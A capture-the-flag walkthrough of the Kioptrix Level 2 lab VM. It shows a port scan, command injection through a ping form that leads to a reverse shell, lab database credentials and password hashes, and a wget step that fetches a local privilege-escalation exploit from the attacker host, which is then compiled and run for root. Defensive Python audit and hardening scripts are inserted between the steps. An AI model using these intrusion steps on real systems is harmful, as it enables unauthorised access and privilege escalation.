Kioptrix Level 2
Information gathering: Nmap
root@kali:~# nmap -p0-65535 192.168.1.8 -vv -A
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 23:57 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating ARP Ping Scan at 23:57
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 23:57, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating SYN Stealth Scan at 23:57
Scanning 192.168.1.8 [65536 ports]
Discovered open port 3306/tcp on 192.168.1.8
Discovered open port 22/tcp on 192.168.1.8
Discovered open port 80/tcp on 192.168.1.8
Discovered open port 111/tcp on 192.168.1.8
Discovered open port 443/tcp on 192.168.1.8
Discovered open port 631/tcp on 192.168.1.8
Discovered open port 742/tcp on 192.168.1.8
Completed SYN Stealth Scan at 23:57, 1.53s elapsed (65536 total ports)
Initiating Service scan at 23:57
Scanning 7 services on 192.168.1.8
Completed Service scan at 23:57, 14.05s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.8
NSE: Script scanning 192.168.1.8.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:58, 30.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
NSE Timing: About 98.44% done; ETC: 23:58 (0:00:00 remaining)
Completed NSE at 23:59, 60.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
Nmap scan report for 192.168.1.8
Host is up, received arp-response (0.00036s latency).
Scanned at 2019-12-06 23:57:39 PST for 107s
Not shown: 65529 closed ports
Reason: 65529 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| ssh-dss
| 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
443/tcp open ssl/https? syn-ack ttl 64
|_ssl-date: 2019-12-07T05:48:44+00:00; -2h09m44s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
742/tcp open status syn-ack ttl 64 1 (RPC #100024)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/6%OT=22%CT=1%CU=41935%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5DEB5BDE%P=x86_64-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW2%O2=M5B4ST11NW2%O3=M5B4NNT11NW2%O4=M5B4ST11NW2%O5=
OS:M5B4ST11NW2%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW2%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.002 days (since Fri Dec 6 23:56:01 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: -2h09m44s
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.1.8
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:59
Completed NSE at 23:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.46 seconds
Raw packets sent: 65556 (2.885MB) | Rcvd: 65555 (2.623MB)
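The scan above already tells a defender most of what matters about this host: SSH protocol 1 is still enabled, the HTTPS service accepts SSLv2, CUPS advertises PUT, and MySQL is reachable over the network. The following Python script is an added example (not part of the original write-up) that parses nmap's normal output in the `-vv` format shown above and turns those observations into findings. The sample input is a constructed excerpt of the report lines; the regular expression assumes nmap's `port/proto state service reason [ttl N] [version]` column layout.

```python
import re

# Constructed sample: service lines copied from the nmap report above.
NMAP_OUTPUT = """\
22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/https? syn-ack ttl 64
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
631/tcp open ipp syn-ack ttl 64 CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
"""

# port/proto  state  service  reason  [ttl N]  [version text]
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+\S+(?:\s+ttl\s+\d+)?\s*(.*)$")


def parse_nmap(text):
    """Turn nmap -vv normal output into a list of service records."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "script": [],
            }
            services.append(current)
        elif line.startswith("|") and current is not None:
            # NSE script output lines belong to the most recent port
            current["script"].append(line.lstrip("|_ ").strip())
    return services


def audit(services):
    """Return (port, issue) pairs for legacy protocols and risky settings."""
    findings = []
    for s in services:
        tag = f"{s['port']}/{s['proto']}"
        script = "\n".join(s["script"])
        if "Server supports SSHv1" in script or "protocol 1.99" in s["version"]:
            findings.append((tag, "SSH protocol 1 enabled"))
        if "SSLv2 supported" in script:
            findings.append((tag, "SSLv2 enabled"))
        m = re.search(r"Potentially risky methods: (.+)", script)
        if m:
            findings.append((tag, "risky HTTP methods: " + m.group(1).strip()))
        if s["service"] == "mysql":
            findings.append((tag, "MySQL listening on a network interface"))
    return findings


if __name__ == "__main__":
    for port, issue in audit(parse_nmap(NMAP_OUTPUT)):
        print(port, issue)
```

Run against the full report it produces one line per finding; the same parser can be pointed at saved `nmap -oN` files from a scheduled scan so that a newly enabled legacy protocol shows up as a diff.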
Trying port 80
I tried injecting "ping host && custom command".
It executed; in fact, I succeeded.
Next I tried to get a reverse shell.
root@kali:~# nc -nvlp 64444
listening on [any] 64444 ...
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.8] 41528
bash: /usr/bin/bash: No such file or directory
root@kali:~# nc -nlp 64444
bash: /usr/bin/bash: No such file or directory
root@kali:~# nc -nlp 64444
whoami
apache
whoami
apache
whomai
/bin/sh: line 3: whomai: command not found
bash
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:53:19:4C
inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: 240d:1a:6af:1d00:20c:29ff:fe53:194c/64 Scope:Global
inet6 addr: fe80::20c:29ff:fe53:194c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1307413 errors:0 dropped:0 overruns:0 frame:0
TX packets:231059 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:89743636 (85.5 MiB) TX bytes:44175075 (42.1 MiB)
Interrupt:177 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:197 errors:0 dropped:0 overruns:0 frame:0
TX packets:197 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15318 (14.9 KiB) TX bytes:15318 (14.9 KiB)
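The injection works because the value typed into the ping form ends up inside a shell command line, so `&&` terminates the ping and starts a second command. The page does not show pingit.php, so the script below is an added Python example (not the original code) that reconstructs the bug as a hypothetical string builder and places the hardened version next to it: validate the target as a single IP address or hostname, then hand it to the program as one argv element with no shell involved. `vulnerable_ping_command` only returns the string and never executes it.

```python
import ipaddress
import re

# RFC 1123-style hostname: labels of letters, digits and hyphens,
# no leading or trailing hyphen, at most 253 characters in total
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

# Characters that let a shell change command structure
SHELL_METACHARS = set("&|;`$(){}<>\\'\"\n")


def vulnerable_ping_command(target):
    """Hypothetical reconstruction of the bug: the form value is pasted into a
    shell command line. Returned as a string only; nothing executes it."""
    return "ping -c 3 " + target


def injected_metachars(command):
    """Shell metacharacters present in a command string; a non-empty result
    means the user-supplied part can alter what the shell runs."""
    return sorted(ch for ch in SHELL_METACHARS if ch in command)


def is_safe_target(target):
    """Accept exactly one literal IP address or one plain hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def hardened_ping_argv(target):
    """Validate first, then build an argv list for subprocess.run(argv)
    with shell=False: the target reaches ping as a single argument and
    is never interpreted by a shell."""
    if not is_safe_target(target):
        raise ValueError("refusing ping target: " + repr(target))
    return ["ping", "-c", "3", target]


if __name__ == "__main__":
    print(injected_metachars(vulnerable_ping_command("192.168.1.8 && whoami")))
    print(hardened_ping_argv("192.168.1.8"))
```

The validator also rejects anything starting with a hyphen, so a target cannot be turned into an extra ping option. In PHP the equivalent pattern is `filter_var($ip, FILTER_VALIDATE_IP)` for validation and `escapeshellarg()` for anything that must still pass through a shell.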
Now I have the privileges of the "apache" user.
Find the MySQL password
ls
index.php
pingit.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
    $username = $_POST['uname'];
    $password = $_POST['psw'];
    // Form values are concatenated straight into the SQL text (SQL injection)
    $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
    //print $query."<br>";
    $result = mysql_query($query);
    $row = mysql_fetch_array($result);
    //print "ID: ".$row['id']."<br />";
}
?>
<html>
<body>
<?php
if ($row['id']==""){
?>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
  <table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
    <tr>
      <td colspan='2' align='center'>
        <b>Remote System Administration Login</b>
      </td>
    </tr>
    <tr>
      <td width="150">Username</td>
      <td><input name="uname" type="text"></td>
    </tr>
    <tr>
      <td width="150">Password</td>
      <td>
        <input name="psw" type="password">
      </td>
    </tr>
    <tr>
      <td colspan="2" align="center">
        <input type="submit" name="btnLogin" value="Login">
      </td>
    </tr>
  </table>
</form>
<?php
} //END of login form
?>
<!-- Start of HTML when logged in as Administrator -->
<?php
// Only the row with id 1 (admin) gets the ping console; the form posts to pingit.php
if ($row['id']==1){
?>
<form name="ping" action="pingit.php" method="post" target="_blank">
  <table width='600' border='1'>
    <tr valign='middle'>
      <td colspan='2' align='center'>
        <b>Welcome to the Basic Administrative Web Console<br></b>
      </td>
    </tr>
    <tr valign='middle'>
      <td align='center'>
        Ping a Machine on the Network:
      </td>
      <td align='center'>
        <input type="text" name="ip" size="30">
        <input type="submit" value="submit" name="submit">
      </td>
    </tr>
  </table>
</form>
<?php
}
?>
</body>
</html>
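index.php builds its login query by pasting `$username` and `$password` into the SQL string, so any quote character in the input changes the query rather than being matched as data. The Python script below is an added example (not code from the page) that reproduces that construction against a constructed in-memory SQLite copy of the `users` table and places the parameterized form beside it. The table contents and passwords are made up; the page's table stores plaintext passwords, and the example keeps that comparison only to show the query difference, not as a recommended design.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the webapp.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "example-admin-pw"), (2, "o'brien", "example-user-pw")])
    return conn


def login_concatenated(conn, username, password):
    """Same construction as index.php: values pasted into the SQL text.
    Returns the matched id or None."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password='{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened form: the driver sends the values separately from the
    statement, so quotes in the input stay inside the value."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def concatenated_query_is_valid(conn, username, password):
    """True if the concatenated query still parses for this input; a single
    quote in a legitimate username is enough to break it."""
    try:
        login_concatenated(conn, username, password)
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    conn = make_db()
    print(login_parameterized(conn, "o'brien", "example-user-pw"))   # 2
    print(concatenated_query_is_valid(conn, "o'brien", "example-user-pw"))  # False
```

The failing case is a perfectly ordinary username with an apostrophe: the concatenated query becomes a syntax error, which is the same mechanism an attacker relies on to rewrite the `WHERE` clause. The parameterized version returns the correct row for the same input, and the `$row['id']==1` admin check in index.php could then be kept unchanged.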
Get MySQL database information
mysql -u john -p
Enter password: hiroshima
use mysql;
select * from user;
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Create_tmp_table_priv Lock_tables_priv Execute_priv Repl_slave_priv Repl_client_priv ssl_type ssl_cipher x509_issuer x509_subject max_questions max_updates max_connections
localhost root 5a6914ba69e02807 Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y YY Y Y Y Y 0 0 0
localhost.localdomain root 5a6914ba69e02807 Y Y Y Y Y Y Y Y Y Y Y Y Y Y YY Y Y Y Y Y 0 0 0
localhost.localdomain N N N N N N N N N N N N N N N N NN N N N 0 0 0
localhost N N N N N N N N N N N N N N N N N NN N N 0 0 0
localhost john 5a6914ba69e02807 Y Y Y Y N N N N N N N N N N N NN N N N N 0 0 0
select user from user;
user
john
root
root
select * from user;
Host User Password Select_priv Insert_priv Update_priv Delete_priv Create_priv Drop_priv Reload_priv Shutdown_priv Process_priv File_priv Grant_priv References_priv Index_priv Alter_priv Show_db_priv Super_priv Crea
Contents of the users table that index.php queries (webapp database):
id username password
1 admin 5afac8d85f
2 john 66lajGGbla
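Three things in the `mysql.user` output deserve a defender's attention: the hashes are the 16-hex-digit pre-4.1 format, two anonymous accounts with empty passwords exist, and `root` and `john` carry the identical hash, which (because that hash format is unsalted) means the application's database password is also the MySQL root password. The script below is an added Python example, not part of the write-up, that audits rows in the `(host, user, password)` shape; the rows are constructed from the listing above and the hash-format checks assume the two MySQL native formats (16 lowercase hex digits, or `*` followed by 40 uppercase hex digits).

```python
import re

# Constructed from the Host/User/Password columns of the mysql.user rows above.
MYSQL_USER_ROWS = [
    ("localhost", "root", "5a6914ba69e02807"),
    ("localhost.localdomain", "root", "5a6914ba69e02807"),
    ("localhost.localdomain", "", ""),
    ("localhost", "", ""),
    ("localhost", "john", "5a6914ba69e02807"),
]

OLD_HASH_RE = re.compile(r"^[0-9a-f]{16}$")    # pre-4.1 "old_password" format
NEW_HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")   # 4.1+ format (SHA-1 based)


def audit_mysql_users(rows):
    """Return (account, issue) pairs for weak, anonymous or shared credentials."""
    findings = []
    by_hash = {}
    for host, user, pw in rows:
        acct = f"'{user}'@'{host}'"
        if user == "":
            findings.append((acct, "anonymous account"))
        if pw == "":
            findings.append((acct, "empty password"))
        elif OLD_HASH_RE.match(pw):
            findings.append((acct, "pre-4.1 password hash"))
            by_hash.setdefault(pw, []).append((user, acct))
        elif NEW_HASH_RE.match(pw):
            by_hash.setdefault(pw, []).append((user, acct))
        else:
            findings.append((acct, "unrecognised password hash format"))
    # Both native formats are unsalted, so equal hashes mean equal passwords.
    # The same user on several hosts is expected; different users are not.
    for pw, accts in by_hash.items():
        if len({user for user, _ in accts}) > 1:
            findings.append((", ".join(a for _, a in accts),
                             "same password used by different users"))
    return findings


if __name__ == "__main__":
    for account, issue in audit_mysql_users(MYSQL_USER_ROWS):
        print(account, "->", issue)
```

Feeding it the output of `SELECT Host, User, Password FROM mysql.user` from a real server is enough to catch the three conditions seen here; the fixes are to drop the anonymous accounts, give the application user its own password with only the privileges it needs, and regenerate every hash in the current format.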
Use the privilege escalation code (9542.c)
wget http://192.168.1.7/9542.c /tmp
--03:27:15-- http://192.168.1.7/9542.c
=> `9542.c'
Connecting to 192.168.1.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]
9542.c: Permission denied
Cannot write to `9542.c' (Permission denied).
/tmp: Unsupported scheme.
FINISHED --03:27:15--
Downloaded: 0 bytes in 0 files
ls -al
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
cd /tmp
ls
lib_mysqludf_sys.so
wget http://192.168.1.7/9542.c /tmp/
--03:28:02-- http://192.168.1.7/9542.c
=> `9542.c'
Connecting to 192.168.1.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/octet-stream]
0K .. 100% 93.35 MB/s
03:28:02 (93.35 MB/s) - `9542.c' saved [2643/2643]
/tmp/: Unsupported scheme.
FINISHED --03:28:02--
Downloaded: 2,643 bytes in 1 files
ls -al
total 40
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
gcc 9542.c
9542.c:109:28: warning: no newline at end of file
ls -al
total 48
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
-rwxr-xr-x 1 apache apache 6932 Dec 7 03:28 a.out
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
./a.out
sh: no job control in this shell
sh-3.00# ls -al
total 48
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
-rwxr-xr-x 1 apache apache 6932 Dec 7 03:28 a.out
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
sh-3.00# whoami
root
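The escalation relied on two things a defender can check for: `/tmp` was writable and executable by the `apache` account, and a C source file, its compiled `a.out` and a shared object owned by that account were sitting in it. The script below is an added Python example (not part of the write-up) that parses the `ls -al` listing shown above and flags exactly those artefacts; the listing is embedded as constructed input and the set of service accounts is an assumption you would adapt to your own hosts.

```python
import re

# Constructed from the `ls -al` listing of /tmp above.
LS_OUTPUT = """\
total 48
drwxr-xrwx 4 root root 4096 Dec 7 03:28 .
drwxr-xr-x 23 root root 4096 Dec 7 00:41 ..
-rw-r--r-- 1 apache apache 2643 Dec 7 2019 9542.c
-rwxr-xr-x 1 apache apache 6932 Dec 7 03:28 a.out
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .font-unix
drwxrwxrwt 2 root root 4096 Dec 7 00:41 .ICE-unix
-rw-r--r-- 1 apache apache 12896 Dec 7 2019 lib_mysqludf_sys.so
"""

# type  perms  links  owner  group  size  month day time|year  name
LS_RE = re.compile(
    r"^([-dlcbps])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"\S+\s+\d+\s+\S+\s+(.+)$")

# Assumed: accounts that should never own code or binaries in a shared temp dir
SERVICE_ACCOUNTS = {"apache", "www-data", "mysql", "nobody"}


def parse_ls(text):
    """Parse `ls -al` lines into dicts; the 'total' line is skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:
            entries.append({"type": m.group(1), "perms": m.group(2),
                            "owner": m.group(3), "group": m.group(4),
                            "size": int(m.group(5)), "name": m.group(6)})
    return entries


def suspicious_entries(entries):
    """Flag a world-writable directory lacking the sticky bit, and any code
    or executable that a service account has dropped into it."""
    findings = []
    for e in entries:
        perms = e["perms"]
        if e["name"] == ".":
            # perms[7] is the 'other' write bit, perms[8] shows the sticky bit as t/T
            if perms[7] == "w" and perms[8] not in "tT":
                findings.append((".", "world-writable directory without sticky bit"))
            continue
        if e["name"] == ".." or e["type"] != "-" or e["owner"] not in SERVICE_ACCOUNTS:
            continue
        if perms[2] in "xs" or perms[5] in "xs" or perms[8] in "xt":
            findings.append((e["name"], "executable owned by " + e["owner"]))
        elif e["name"].endswith(".c"):
            findings.append((e["name"], "C source owned by " + e["owner"]))
        elif e["name"].endswith(".so"):
            findings.append((e["name"], "shared object owned by " + e["owner"]))
    return findings


if __name__ == "__main__":
    for name, reason in suspicious_entries(parse_ls(LS_OUTPUT)):
        print(name, "->", reason)
```

On a live system the same check runs over `os.scandir('/tmp')` instead of a saved listing. The matching mitigations are mounting `/tmp` with `noexec` so `./a.out` cannot be started there, removing the compiler from a production web host, and alerting when a web service account creates executable files anywhere.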